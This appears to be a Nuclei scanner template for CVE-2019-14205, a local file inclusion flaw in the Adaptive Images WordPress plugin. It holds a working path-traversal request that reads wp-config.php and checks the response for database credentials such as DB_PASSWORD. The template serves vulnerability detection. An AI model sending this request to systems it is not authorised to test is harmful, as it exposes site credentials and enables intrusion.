26 lines
889 B
YAML
26 lines
889 B
YAML
id: CVE-2019-14205
|
|
info:
|
|
name: WordPress Ext Adaptive Images LFI
|
|
author: pikpikcu
|
|
severity: high
|
|
tags: cve,cve2019,wordpress,wp-plugin,lfi
|
|
description: A Local File Inclusion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php.
|
|
reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "DB_NAME"
|
|
- "DB_PASSWORD"
|
|
part: body
|
|
condition: and
|
|
- type: status
|
|
status:
|
|
- 200
|